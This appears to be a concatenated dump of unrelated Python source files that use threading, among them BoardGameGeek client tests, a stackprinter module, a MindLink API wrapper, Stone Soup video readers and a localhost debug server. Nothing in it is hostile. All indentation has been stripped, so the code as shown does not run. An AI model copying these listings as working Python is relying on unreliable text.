assert node == "hello"
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attribute_thats_missing", default=1234)
assert node == 1234
# test quiet
with pytest.raises(Exception):
# attr can't be converted to int
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr", convert=int)
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr", convert=int, quiet=True)
assert node == None
node = bggutil.xml_subelement_attr(xml, "node1", attribute="attr", convert=int, default=999, quiet=True)
assert node == 999
def test_get_xml_subelement_attr_list(xml):
nodes = bggutil.xml_subelement_attr_list(None, "list")
assert nodes is None
nodes = bggutil.xml_subelement_attr_list(xml, None)
assert nodes is None
nodes = bggutil.xml_subelement_attr_list(xml, "")
assert nodes is None
list_root = xml.find("list")
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr")
assert nodes == ["elem1", "elem2", "elem3", "elem4"]
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="int_attr", convert=int)
assert nodes == [1, 2, 3, 4]
nodes = bggutil.xml_subelement_attr_list(xml, "node1", attribute="attr")
assert nodes == ["hello1"]
# test default
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="missing_attr", default="n/a")
assert nodes == ["n/a", "n/a", "n/a", "n/a"]
# test quiet
with pytest.raises(Exception):
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr", convert=int)
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr", convert=int, quiet=True)
assert nodes == [None, None, None, None]
nodes = bggutil.xml_subelement_attr_list(list_root, "li", attribute="attr", convert=int, quiet=True, default=1)
assert nodes == [1, 1, 1, 1]
def test_get_xml_subelement_text(xml):
node = bggutil.xml_subelement_text(None, "node1")
assert node is None
node = bggutil.xml_subelement_text(xml, None)
assert node is None
node = bggutil.xml_subelement_text(None, "")
assert node is None
node = bggutil.xml_subelement_text(xml, "node1")
assert node == "text"
# test that default is working
node = bggutil.xml_subelement_text(xml, "node_thats_missing", default="default text")
assert node == "default text"
# test that quiet is working
with pytest.raises(Exception):
node = bggutil.xml_subelement_text(xml, "node1", convert=int)
node = bggutil.xml_subelement_text(xml, "node1", convert=int, quiet=True)
assert node == None
node = bggutil.xml_subelement_text(xml, "node1", convert=int, quiet=True, default="asd")
assert node == "asd"
@pytest.mark.serialize
def test_serialization():
dummy_plays = Thing({"id": "10", "name": "fubar"})
s = pickle.dumps(dummy_plays)
assert s is not None
dummy_unserialized = pickle.loads(s)
assert type(dummy_unserialized) == Thing
def test_rate_limiting_for_requests():
# create two threads, give each a list of games to fetch, disable cache and time the amount needed to
# fetch the data. requests should be serialized, even if made from two different threads
test_set_1 = [5, # acquire
31260, # agricola
72125] # "eclipse"
test_set_2 = [18602, # caylus
28720, # brass
53953] # thunderstone]
def _worker_thread(games):
bgg = BGGClient(cache=None, requests_per_minute=20)
for g in games:
bgg.game(game_id=g)
t1 = threading.Thread(target=_worker_thread, args=(test_set_1, ))
t2 = threading.Thread(target=_worker_thread, args=(test_set_2, ))
start_time = time.time()
t1.start()
t2.start()
t1.join(timeout=10000)
t2.join(timeout=10000)
end_time = time.time()
# 20 requests per minute => a request every 3 seconds x 6 games => should take around 18 seconds
assert 15 < end_time - start_time < 21 # +/- a few seconds...
# second test, use caching and confirm it's working when combined with the rate limiting algorithm
# do cached requests for the test set, then do them again. should take only half of the time
bgg = BGGClient(requests_per_minute=20)
start_time = time.time()
for g in test_set_1:
bgg.game(game_id=g)
end_time = time.time()
assert 7 < end_time - start_time < 17 # 3 games should take ~9 seconds
# repeat requests, should be served from cache
for g in test_set_1:
bgg.game(game_id=g)
assert 0 < time.time() - end_time < 2
def test_html_unescape_function():
escaped = "<tag>"
unescaped = bggutil.html_unescape(escaped)
assert unescaped == "<tag>"
|
App.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import threading
import time
import atexit
from modules.Blinkt import Blinkt
from modules.Config import *
from modules.Data import Data
from modules.Log import log_str
from modules.ScrollPhat import ScrollPhat
from modules.UniCorn import UniCorn
from modules.Update import Update
class App(object):
def __init__(self):
self.name = 'myApp'
log_str('init {}'.format(self.name))
self.running = True
atexit.register(self.stop)
def start(self):
log_str('start {}'.format(self.name))
log_str('still alive {}'.format(self.running))
# do init stuff here
self.clear_all(True)
Blinkt().show_graph()
ScrollPhat().show_str()
UniCorn().draw_animation()
try:
log_str('still alive {}'.format(self.running))
# start all loops
Update().data_loop()
ScrollPhat().show_str(Data().output_str())
Blinkt().show_graph(Data().get_rain_forecast())
UniCorn().icon_loop()
log_str('after the image loop')
Blinkt().led_loop()
log_str('after the led loop')
ScrollPhat().str_loop()
log_str('after the scroll loop')
while self.running:
time.sleep(1)
log_str('still alive {}'.format(self.running))
log_str('still alive {}'.format(self.running))
except KeyboardInterrupt:
log_str('*** quit: {}'.format(self.name))
atexit._run_exitfuncs()
def stop(self):
log_str('stop {}'.format(self.name))
self.quit_all()
def quit_all(self):
log_str('kill all timers')
try:
for timer in TIMER:
timer.cancel()
finally:
self.clear_all(False)
def run(self):
log_str('run {}'.format(self.name))
self.start()
def clear_all(self, fast=True):
log_str('clear all {}'.format(self.name))
Blinkt().clear(fast)
ScrollPhat().clear(fast)
UniCorn().clear(fast)
if __name__ == '__main__':
myApp = App()
if sys.argv[1] == 'icon_test':
pass
elif sys.argv[1] == 'run':
main_thread = threading.Thread(target=myApp.run(), daemon=True)
THREADS.append(main_thread)
main_thread.start()
elif sys.argv[1] == 'clear':
myApp.stop()
else:
pass
|
__init__.py
|
import sys
import types
import warnings
from threading import Thread
from functools import wraps
import stackprinter.formatting as fmt
from stackprinter.tracing import TracePrinter, trace
def _guess_thing(f):
""" default to the current exception or current stack frame"""
# the only reason this happens up here is to keep sys._getframe at the same
# call depth relative to an invocation of `show` or `format`, even when
# `format` is called _by_ `show`.
@wraps(f)
def show_or_format(thing=None, *args, **kwargs):
if thing is None:
thing = sys.exc_info()
if thing == (None, None, None):
thing = sys._getframe(1)
return f(thing, *args, **kwargs)
return show_or_format
@_guess_thing
def format(thing=None, **kwargs):
"""
Render the traceback of an exception or a frame's call stack
Call this without arguments inside an `except` block to get a traceback for
the currently handled exception:
```
try:
something()
except:
logger.err(stackprinter.format(**kwargs))
```
Explicitly pass an exception (or a triple as returned by `sys.exc_info()`)
to handle that particular exception anywhere, also outside an except block.
```
try:
something()
except Exception as e:
last_exc = e
if last_exc:
logger.err(stackprinter.format(last_exc, **kwargs))
```
Pass a frame object to see the call stack leading up to that frame:
```
stack = stackprinter.format(sys._getframe(2), **kwargs))
```
Pass a thread object to see its current call stack:
```
thread = threading.Thread(target=something)
thread.start()
# (...)
stack = stackprinter.format(thread, **kwargs))
```
Note:
This displays variable values as they are _at the time of formatting_. In
multi-threaded programs, variables can change while we're busy walking
the stack & printing them. So, if nothing seems to make sense, consider that
your exception and the traceback messages are from slightly different times.
Sadly, there is no responsible way to freeze all other threads as soon
as we want to inspect some thread's call stack (...or is there?)
Params
---
thing: (optional) exception, sys.exc_info() tuple, frame or thread
What to format. Defaults to the currently handled exception or current
stack frame.
style: string
'plaintext' (default): Output just text
'darkbg', 'darkbg2', 'darkbg3', 'lightbg', 'lightbg2', 'lightbg3':
Enable colors, for use in terminals that support 256 ansi
colors or in jupyter notebooks (or even with `ansi2html`)
source_lines: int or 'all'
Select how much source code context will be shown.
int 0: Don't include a source listing.
int n > 0: Show n lines of code. (default: 5)
string 'all': Show the whole scope of the frame.
show_signature: bool (default True)
Always include the function header in the source code listing.
show_vals: str or None
Select which variable values will be shown.
'line': Show only the variables on the highlighted line.
'like_source' (default): Show only those visible in the source listing
'all': Show every variable in the scope of the frame.
None: Don't show any variable values.
truncate_vals: int
Maximum number of characters to be used for each variable value.
Default: 500
suppressed_paths: list of regex patterns
Set less verbose formatting for frames whose code lives in certain paths
(e.g. library code). Files whose path matches any of the given regex
patterns will be considered boring. The first call to boring code is
rendered with fewer code lines (but with argument values still visible),
while deeper calls within boring code get a single line and no variable
values.
Example: To hide numpy internals from the traceback, set
`suppressed_paths=[r"lib/python.*/site-packages/numpy"]`
reverse: bool
List the innermost frame first.
add_summary: True, False, 'auto'
Append a compact list of involved files and source lines, similar
to the built-in traceback message.
'auto' (default): do that if the main traceback is longer than 50 lines.
"""
if isinstance(thing, types.FrameType):
return fmt.format_stack_from_frame(thing, **kwargs)
elif isinstance(thing, Thread):
return format_thread(thing, **kwargs)
elif isinstance(thing, Exception):
exc_info = (thing.__class__, thing, thing.__traceback__)
return format(exc_info, **kwargs)
elif _is_exc_info(thing):
return fmt.format_exc_info(*thing, **kwargs)
else:
raise ValueError("Can't format %s. "\
"Expected an exception instance, sys.exc_info() tuple,"\
"a frame or a thread object." % repr(thing))
@_guess_thing
def show(thing=None, file='stderr', **kwargs):
"""
Print the traceback of an exception or a frame's call stack
Params
---
file: 'stderr', 'stdout' or file-like object
defaults to stderr
**kwargs:
See `format`
"""
if file == 'stderr':
file = sys.stderr
elif file == 'stdout':
file = sys.stdout
print(format(thing, **kwargs), file=file)
def format_current_stack(**kwargs):
""" Render the current thread's call stack.
Params
--
**kwargs:
See `format`
"""
return format(sys._getframe(1), **kwargs)
def show_current_stack(**kwargs):
""" Print the current thread's call stack.
Params
--
**kwargs:
See `show`
"""
show(sys._getframe(1), **kwargs)
def format_current_exception(**kwargs):
"""
Render a traceback for the currently handled exception.
Params
--
**kwargs:
See `format`
"""
return format(sys.exc_info(), **kwargs)
def show_current_exception(file=sys.stderr, **kwargs):
"""
Print a traceback for the currently handled exception.
Params
--
**kwargs:
See `show`
"""
print(format_current_exception(**kwargs), file=file)
def set_excepthook(**kwargs):
"""
Set sys.excepthook to print a detailed traceback for any uncaught exception.
See `format()` for available kwargs.
Examples:
----
Print to stdout instead of stderr:
```
set_excepthook(file='stdout')
```
Enable color output:
```
set_excepthook(style='darkbg') # or e.g. 'lightbg' (for more options see `format`)
```
If running under Ipython, this will, with a heavy heart, attempt to monkey
patch Ipython's traceback printer (which handles all exceptions internally,
thus bypassing the system excepthook). You can decide whether this sounds
like a sane idea.
To undo, call `remove_excepthook`.
Params
--
**kwargs:
See `show` and `format`
"""
if _is_running_in_ipython():
_patch_ipython_excepthook(**kwargs)
else:
def hook(*args):
show(args, **kwargs)
sys.excepthook = hook
def remove_excepthook():
""" Reinstate the default excepthook """
if _is_running_in_ipython():
_unpatch_ipython_excepthook()
sys.excepthook = sys.__excepthook__
def _is_running_in_ipython():
try:
return __IPYTHON__
except NameError:
return False
ipy_tb = None
def _patch_ipython_excepthook(**kwargs):
""" Replace ipython's built-in traceback printer, excellent though it is"""
global ipy_tb
blacklist = kwargs.get('suppressed_paths', [])
blacklist.append('site-packages/IPython/')
kwargs['suppressed_paths'] = blacklist
if 'file' in kwargs:
del kwargs['file']
def format_tb(*exc_tuple, **__):
unstructured_tb = format(exc_tuple, **kwargs)
structured_tb = [unstructured_tb] # \*coughs*
return structured_tb
import IPython
shell = IPython.get_ipython()
if ipy_tb is None:
ipy_tb = shell.InteractiveTB.structured_traceback
shell.InteractiveTB.structured_traceback = format_tb
def _unpatch_ipython_excepthook():
""" restore proper order in Ipython """
import IPython
shell = IPython.get_ipython()
if ipy_tb is not None:
shell.InteractiveTB.structured_traceback = ipy_tb
def _is_exc_info(thing):
if not isinstance(thing, tuple) or len(thing) != 3:
return False
a, b, c = thing
return (isinstance(a, type) and BaseException in a.mro() and
isinstance(b, BaseException))
def format_thread(thread, add_summary=False, **kwargs):
try:
fr = sys._current_frames()[thread.ident]
except KeyError:
return "%r: no frames found" % thread
else:
if 'suppressed_paths' not in kwargs:
kwargs['suppressed_paths'] = []
kwargs['suppressed_paths'] += [r"lib/python.*/threading\.py"]
msg = fmt.format_stack_from_frame(fr, **kwargs)
msg_indented = ' ' + '\n '.join(msg.split('\n')).strip()
return "%r\n\n%s" % (thread, msg_indented)
|
api_connection.py
|
"""
MindLink API samples.
For more information, visit our developer wiki @https://wiki.mindlinksoft.com/tiki-index.php?page=MindLink+API and our engineering blog @https://engineering.mindlinksoft.com/
The samples are provided "as is". Do feel free to experiment or use them as you deem fit. Have fun!
ApiConnection.py
This module exposes methods to perform authentication and basic collaboration operations, like getting, sending messages and streaming messages event from channels.
For usage samples, check the sample_bot.py file.
"""
import requests
import threading
class ApiConnection:
def __init__(self, host, username, password, agent):
self.host = host
self.username = username
self.password = password
self.agent = agent
self.last_event = 0
self.running = False
self.token = ''
def authenticate(self):
request_url = '{}/Authentication/V1/Tokens'.format(self.host)
response = requests.post(request_url, json = {
'Username': self.username,
'Password': self.password,
'AgentId': self.agent
}, headers = {
'Accept' : 'application/json'
})
if response.status_code == 200:
self.token = response.json()
return self.token
print ('Something went wrong while authenticating!', response.status_code, response.reason)
def get_messages(self, channel_id, count):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Messages'.format(self.host, channel_id)
parameters = {
'take': count,
}
response = requests.get(
request_url,
params = parameters,
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code == 200:
return response.json()
print ('Something went wrong while getting messages!', response.status_code, response.reason)
def send_message(self, channel_id, content, is_alert, classification, security_context):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Messages'.format(self.host, channel_id)
response = requests.post(
request_url,
json = {
'Text': content,
'IsAlert': is_alert,
'Classification': classification,
'SecurityContext': security_context
},
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code != 200:
print ('Something went wrong while sending a message to a channel!', channel_id, response.status_code, response.reason)
def send_message_parts(self, channel_id, messageParts, is_alert, classification, security_context):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Messages'.format(self.host, channel_id)
response = requests.post(
request_url,
json = {
'MessageParts': messageParts,
'IsAlert': is_alert,
'Classification': classification,
'SecurityContext': security_context
},
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code != 200:
print ('Something went wrong while sending a message-part message to a channel!', channel_id, response.status_code, response.reason)
def update_channel_agent_state(self, channel_id, is_composing):
if self.token == '':
self.authenticate()
request_url = '{}/Collaboration/V1/Channels/{}/Me'.format(self.host, channel_id)
response = requests.post(
request_url,
json = {
'IsComposing': is_composing
},
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)}
)
if response.status_code != 200:
print ('Something went wrong while updating channel agent state!', channel_id, response.status_code, response.reason)
def get_events(self, channel_id, callback):
if self.token == '':
self.authenticate()
self.running = True
while self.running:
request_url = '{}/Collaboration/V1/Events'.format(self.host)
parameters = {
'last-event': self.last_event,
'types': ['message'],
'channels': [channel_id],
'regex': '',
'origins': 'remote'
}
response = requests.get(
request_url,
params = parameters,
headers = {
'Accept' : 'application/json',
'Authorization': 'FCF {}'.format(self.token)
})
if response.status_code != 200:
print ('Something went wrong while getting events!', response.status_code, response.reason)
continue
for event in response.json():
eventId = event['EventId']
if eventId > self.last_event:
self.last_event = eventId
callback(event)
def start_streaming(self, channel_id, callback):
self.events_thread = threading.Thread(target=self.get_events, args = (channel_id, callback))
self.events_thread.start()
def stop_streaming(self):
self.running = False
|
video.py
|
# -*- coding: utf-8 -*-
"""Video readers for Stone Soup.
This is a collection of video readers for Stone Soup, allowing quick reading
of video data/streams.
"""
import datetime
import threading
from abc import abstractmethod
from queue import Queue
from typing import Mapping, Tuple, Sequence, Any
from urllib.parse import ParseResult
import numpy as np
try:
import ffmpeg
import moviepy.editor as mpy
except ImportError as error:
raise ImportError(
"Usage of video processing classes requires that the optional"
"package dependencies 'moviepy' and 'ffmpeg-python' are installed. "
"This can be achieved by running "
"'python -m pip install stonesoup[video]'")\
from error
from .base import SensorDataReader
from .file import FileReader
from .url import UrlReader
from ..base import Property
from ..buffered_generator import BufferedGenerator
from ..types.sensordata import ImageFrame
class FrameReader(SensorDataReader):
"""FrameReader base class
A FrameReader produces :class:`~.SensorData` in the form of
:class:`~ImageFrame` objects.
"""
@property
def frame(self):
return self.sensor_data
@abstractmethod
@BufferedGenerator.generator_method
def frames_gen(self):
"""Returns a generator of frames for each time step.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
raise NotImplementedError
@BufferedGenerator.generator_method
def sensor_data_gen(self):
"""Returns a generator of frames for each time step.
Note
----
This is just a wrapper around (and therefore performs identically
to) :meth:`~frames_gen`.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
yield from self.frames_gen()
class VideoClipReader(FileReader, FrameReader):
"""VideoClipReader
A simple reader that uses MoviePy_ to read video frames from a file.
Usage of MoviePy allows for the application of clip transformations
and effects, as per the MoviePy documentation_. Upon instantiation,
the underlying MoviePy `VideoFileClip` instance can be accessed
through the :attr:`~clip` class property. This can then be used
as expected, e.g.:
.. code-block:: python
# Rearrange RGB to BGR
def arrange_bgr(image):
return image[:, :, [2, 1, 0]]
reader = VideoClipReader("path_to_file")
reader.clip = reader.clip.fl_image(arrange_bgr)
for timestamp, frame in reader:
# The generated frame.pixels will now
# be arranged in BGR format.
...
.. _MoviePy: https://zulko.github.io/moviepy/index.html
.. _documentation: https://zulko.github.io/moviepy/getting_started/effects.html
""" # noqa:E501
start_time: datetime.timedelta = Property(
doc="Start time expressed as duration from the start of the clip",
default=datetime.timedelta(seconds=0))
end_time: datetime.timedelta = Property(
doc="End time expressed as duration from the start of the clip",
default=None)
timestamp: datetime.datetime = Property(
doc="Timestamp given to the first frame",
default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
end_time_sec = self.end_time.total_seconds() if self.end_time is not None else None
self.clip = mpy.VideoFileClip(str(self.path)) \
.subclip(self.start_time.total_seconds(), end_time_sec)
@BufferedGenerator.generator_method
def frames_gen(self):
if self.timestamp is None:
self.timestamp = datetime.datetime.now()
start_time = self.timestamp
for timestamp_sec, pixels in self.clip.iter_frames(with_times=True):
timestamp = start_time + datetime.timedelta(seconds=timestamp_sec)
frame = ImageFrame(pixels, timestamp)
yield timestamp, frame
class FFmpegVideoStreamReader(UrlReader, FrameReader):
""" FFmpegVideoStreamReader
A threaded reader that uses ffmpeg-python_ to read frames from video
streams (e.g. RTSP) in real-time.
Notes
-----
- Use of this class requires that FFmpeg_ is installed on the host machine.
- By default, FFmpeg performs internal buffering of frames leading to a \
slight delay in the incoming frames (0.5-1 sec). To remove the delay it \
is recommended to set ``input_opts={'threads': 1, 'fflags': 'nobuffer'}`` \
when instantiating a reader, e.g: .
.. code-block:: python
video_reader = FFmpegVideoStreamReader('rtsp://192.168.0.10:554/1/h264minor',
input_opts={'threads': 1, 'fflags': 'nobuffer'})
for timestamp, frame in video_reader:
....
.. _ffmpeg-python: https://github.com/kkroening/ffmpeg-python
.. _FFmpeg: https://www.ffmpeg.org/download.html
"""
url: ParseResult = Property(
doc="Input source to read video stream from, passed as input url argument. This can "
"include any valid FFmpeg input e.g. rtsp URL, device name when using 'dshow'/'v4l2'")
buffer_size: int = Property(
default=1,
doc="Size of the frame buffer. The frame buffer is used to cache frames in cases where "
"the stream generates frames faster than they are ingested by the reader. If "
"`buffer_size` is less than or equal to zero, the buffer size is infinite.")
input_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg input options, provided in the form of a dictionary, whose keys correspond to "
"option names. (e.g. ``{'fflags': 'nobuffer'}``). The default is ``{}``.")
output_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg output options, provided in the form of a dictionary, whose keys correspond "
"to option names. The default is ``{'f': 'rawvideo', 'pix_fmt': 'rgb24'}``.")
filters: Sequence[Tuple[str, Sequence[Any], Mapping[Any, Any]]] = Property(
default=None,
doc="FFmpeg filters, provided in the form of a list of filter name, sequence of "
"arguments, mapping of key/value pairs (e.g. ``[('scale', ('320', '240'), {})]``). "
"Default `None` where no filter will be applied. Note that :attr:`frame_size` may "
"need to be set in when video size changed by filter.")
frame_size: Tuple[int, int] = Property(
default=None,
doc="Tuple of frame width and height. Default `None` where it will be detected using "
"`ffprobe` against the input, but this may yield wrong width/height (e.g. when "
"filters are applied), and such this option can be used to override.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.input_opts is None:
self.input_opts = {}
if self.output_opts is None:
self.output_opts = {'f': 'rawvideo', 'pix_fmt': 'rgb24'}
if self.filters is None:
self.filters = []
self.buffer = Queue(maxsize=self.buffer_size)
if self.frame_size is not None:
self._stream_info = {
'width': self.frame_size[0],
'height': self.frame_size[1]}
else:
# Probe stream information
self._stream_info = next(
s
for s in ffmpeg.probe(self.url.geturl(), **self.input_opts)['streams']
if s['codec_type'] == 'video')
# Initialise stream
self.stream = ffmpeg.input(self.url.geturl(), **self.input_opts)
for filter_ in self.filters:
filter_name, filter_args, filter_kwargs = filter_
self.stream = self.stream.filter(
filter_name, *filter_args, **filter_kwargs
)
self.stream = (
self.stream
.output('pipe:', **self.output_opts)
.global_args('-y', '-loglevel', 'panic')
.run_async(pipe_stdout=True)
)
# Initialise capture thread
self._capture_thread = threading.Thread(target=self._run)
self._capture_thread.daemon = True
self._capture_thread.start()
@BufferedGenerator.generator_method
def frames_gen(self):
while self._capture_thread.is_alive():
# if not self.buffer.empty():
frame = self.buffer.get()
timestamp = frame.timestamp
yield timestamp, frame
def _run(self):
while self.stream.poll() is None:
width = int(self._stream_info['width'])
height = int(self._stream_info['height'])
# Read bytes from stream
in_bytes = self.stream.stdout.read(width * height * 3)
if in_bytes:
# Transform bytes to pixels
frame_np = (
np.frombuffer(in_bytes, np.uint8)
.reshape([height, width, 3])
)
frame = ImageFrame(frame_np, datetime.datetime.now())
# Write new frame to buffer
self.buffer.put(frame)
|
console_dispatcher.py
|
import logging
import sys
import threading
from django.core.management.base import BaseCommand
from django.conf import settings
from fastapp.executors.heartbeat import update_status
from fastapp.console import PusherSenderThread
logger = logging.getLogger("fastapp.executors.console")
class Command(BaseCommand):
args = '<poll_id poll_id ...>'
help = 'Closes the specified poll for voting'
def handle(self, *args, **options):
THREAD_COUNT = settings.FASTAPP_CONSOLE_SENDER_THREADCOUNT
threads = []
host = getattr(settings, "RABBITMQ_HOST", "localhost")
port = getattr(settings, "RABBITMQ_PORT", 5672)
username = getattr(settings, "RABBITMQ_ADMIN_USER", "guest")
password = getattr(settings, "RABBITMQ_ADMIN_PASSWORD", "guest")
# create connection to pusher_queue
CONSOLE_QUEUE = "pusher_events"
queues_consume_console = [[CONSOLE_QUEUE, True]]
for c in range(0, THREAD_COUNT):
name = "PusherSenderThread-%s" % c
thread = PusherSenderThread(name, host, port, "/", username, password, queues_consume=queues_consume_console, ttl=3000)
logger.info("Start '%s'" % name)
threads.append(thread)
thread.daemon = True
thread.start()
update_status_thread = threading.Thread(target=update_status, args=["Console", THREAD_COUNT, threads])
update_status_thread.daemon = True
update_status_thread.start()
for t in threads:
#print "join %s " % t
try:
logger.info("%s Thread started" % THREAD_COUNT)
t.join(1000)
except KeyboardInterrupt:
print "Ctrl-c received."
sys.exit(0)
|
server.py
|
import sys
import socket
import select
import threading
import time
# settings
class SETTINGS:
HOST = '127.0.0.1'
PORT = 54326
class TYPE:
CONSOLE = 'CONSOLE'
DEBUG = 'DEBUG'
# messages
class MESSAGE:
AMENDED = 'AMENDED'
BP_CONFIRM = 'BP_CONFIRM'
BP_RESET = 'BP_RESET'
BP_WAIT = 'BP_WAIT'
BREAK = 'BREAK'
CONTINUED = 'CONTINUED'
DEBUG = 'DEBUG'
DISPLAY = 'DISPLAY'
ENTRY = 'ENTRY'
EXCEPTION = 'EXCEPTION'
EXITED = 'EXITED'
INFO = 'INFO'
PAUSED = 'PAUSED'
SIGNAL = 'SIGNAL'
STEPPED = 'STEPPED'
SYNTAX_ERROR = 'SYNTAX_ERROR'
THREADS = 'THREADS'
RADIX = 'RADIX'
PATHFILTER = 'PATHFILTER'
# commands
class COMMAND:
AMEND = 'a' # a ident frame name value
BP_RESET = 'bpr' # bpr [file [line]]
BP_SET = 'bps' # bps file line
CONTINUE = 'c'
DISPLAY = 'd' # d [frameNum [ident [fullName [start [count]]]]] // frame is zero-based
EXEC = 'e' # e expression // execute expression in the current frame
FRAME = 'f' # f [ident [frameStart [frameNum]]] // frame is zero-based
INFO = 'i'
NEXT = 'n' # n [ident] // step over
PAUSE = 'p'
RETURN = 'r' # r [ident] // step out
STEP = 's' # s [ident] // step in
THREADS = 't'
RADIX = 'x' # x [10|16] // default 10
PATHFILTER = 'y' # y [path] // always trace this path
# server only commands
QUIT = 'q'
HELP = 'h'
_helpInfo = """\
AMEND = 'a' # a ident frame name value
BP_RESET = 'bpr' # bpr [file [line]]
BP_SET = 'bps' # bps file line
CONTINUE = 'c'
DISPLAY = 'd' # d [ident [frame [fullName [start [count]]]]] // frame is zero-based
EXEC = 'e' # e expression // execute expression in the current frame
FRAME = 'f' # f [ident [frameStart [frameNum]]] // frame is zero-based
GOTO = 'g' # g ident line
GOTO_TARGETS = 'gt' # gt file line // test if we can go to target from current place
INFO = 'i'
MODE = 'm' # m [0|1] // user | developer
NEXT = 'n' # n [ident] // step over
PAUSE = 'p'
RETURN = 'r' # r [ident] // step out
STEP = 's' # s [ident] // step in
THREADS = 't'
RADIX = 'x' # x [10|16] // default 10
PATHFILTER = 'y' # y [path] // always trace this path
# server only commands
QUIT = 'q'
HELP = 'h'
"""
class Connection:
def __init__(self, socket):
self._socket = socket
self._recvBuffer = b''
self._sendBuffer = b''
self._type = None
def getType(self):
return self._type
def close(self):
try:
self._socket.close()
except:
pass
self._socket = None
def read(self):
""" EOL delimited. """
self._read()
lines = []
start = 0
while True:
idx = self._recvBuffer.find(b"\n", start)
if idx == -1:
break
line = self._recvBuffer[start:idx].decode()
# first message is the type
if not self._type:
self._type = line
elif line:
lines.append(line)
start = idx + 1
self._recvBuffer = self._recvBuffer[start:]
return lines
def post(self, line):
""" One command per line. Add EOL at the and """
self._sendBuffer += line.encode()
self._sendBuffer += b'\n'
def write(self):
self._write()
def wantRead(self):
return self._socket
def wantWrite(self):
if self._sendBuffer:
return self._socket
return None
def _read(self):
try:
data = self._socket.recv(4096)
if data:
self._recvBuffer += data
except:
pass
def _write(self):
if self._sendBuffer:
try:
sent = self._socket.send(self._sendBuffer)
self._sendBuffer = self._sendBuffer[sent:]
except:
pass
class DebugServer:
def __init__(self, port):
self._port = port
self._listenSocket = None
self._connections = None
self._thread = None
self._stopped = False
def start(self):
if self._thread:
self.stop()
self.join()
self._thread = threading.Thread(target=self._run)
self._stopped = False
self._thread.start()
def stop(self):
self._stopped = True
def join(self):
if self._thread:
self._thread.join()
def isAlive(self):
return self._thread != None and self._thread.is_alive()
def _run(self):
self._listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self._listenSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self._listenSocket.bind((SETTINGS.HOST, self._port))
print('listening port %i' % self._port)
except:
print('port %i is busy' % self._port)
sys.exit()
self._listenSocket.listen(2)
self._listenSocket.setblocking(False)
self._connections = {}
try:
while not self._stopped:
inputs = [self._listenSocket]
outputs = []
for conn in self._connections.values():
inp = conn.wantRead()
if inp:
inputs.append(inp)
outp = conn.wantWrite()
if outp:
outputs.append(outp)
readable, writable, exceptional = select.select(inputs, outputs, inputs)
for s in readable:
if s == self._listenSocket:
self._acceptWrapper()
else:
connection = self._connections[s]
lines = connection.read()
if len(lines) > 0:
if connection.getType() == TYPE.DEBUG:
# print lines
for line in lines:
print(line)
# if line == MESSAGE.EXITED:
# # exit loop
# self._stopped = True
elif connection.getType() == TYPE.CONSOLE:
# test if "pause"
if line == COMMAND.PAUSE:
pass
# pass lines to debuggers
for conn in self._connections.values():
if conn.getType() == TYPE.DEBUG:
for line in lines:
conn.post(line)
for s in writable:
if s != self._listenSocket:
self._connections[s].write()
for s in exceptional:
if s != self._listenSocket:
self._connections[s].close()
del self._connections[s]
except:
pass
for connection in self._connections.values():
try:
connection.close()
except:
pass
self._connections = None
try:
self._listenSocket.close()
except:
pass
self._listenSocket = None
self._thread = None
self._selector = None
def _acceptWrapper(self):
conn, _ = self._listenSocket.accept()
# print("Connected %s" % repr(addr))
conn.setblocking(False)
connection = Connection(conn)
self._connections[conn] = connection
if __name__ == "__main__":
_usage = """\
usage: server.py -p port
Start debug server."""
import getopt
opts, args = getopt.getopt(sys.argv[1:], 'hp:', ['help','port='])
for opt, optarg in opts:
if opt in ['-h', '--help']:
print(_usage)
sys.exit()
elif opt in ['-p', '--port']:
SETTINGS.PORT = int(optarg)
else:
print("Unknown option %s" % opt)
server = DebugServer(SETTINGS.PORT)
server.start()
time.sleep(0.5)
try:
consoleSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
consoleSocket.connect_ex((SETTINGS.HOST, SETTINGS.PORT))
consoleSocket.send((TYPE.CONSOLE + "\n").encode())
while server.isAlive():
if sys.version_info[0] < 3:
cmd = raw_input()
else:
cmd = input()
if cmd == COMMAND.HELP:
print(_helpInfo)
else:
consoleSocket.send((cmd + "\n").encode())
if cmd == COMMAND.QUIT:
break
except:
pass
server.stop()
try:
consoleSocket.send(b"\n")
except:
pass
server.join()
|
benchmark_rap.py
|
import asyncio
import multiprocessing
import time
import uvloop
from rap.client import Client
from rap.server import Server
NUM_CALLS: int = 10000
def run_server() -> None:
async def test_sum(a: int, b: int) -> int:
await asyncio.sleep(0.01)
return a + b
loop: asyncio.AbstractEventLoop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
rpc_server: Server = Server("example")
rpc_server.register(test_sum)
loop.run_until_complete(rpc_server.run_forever())
def run_client() -> None:
loop: asyncio.AbstractEventLoop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
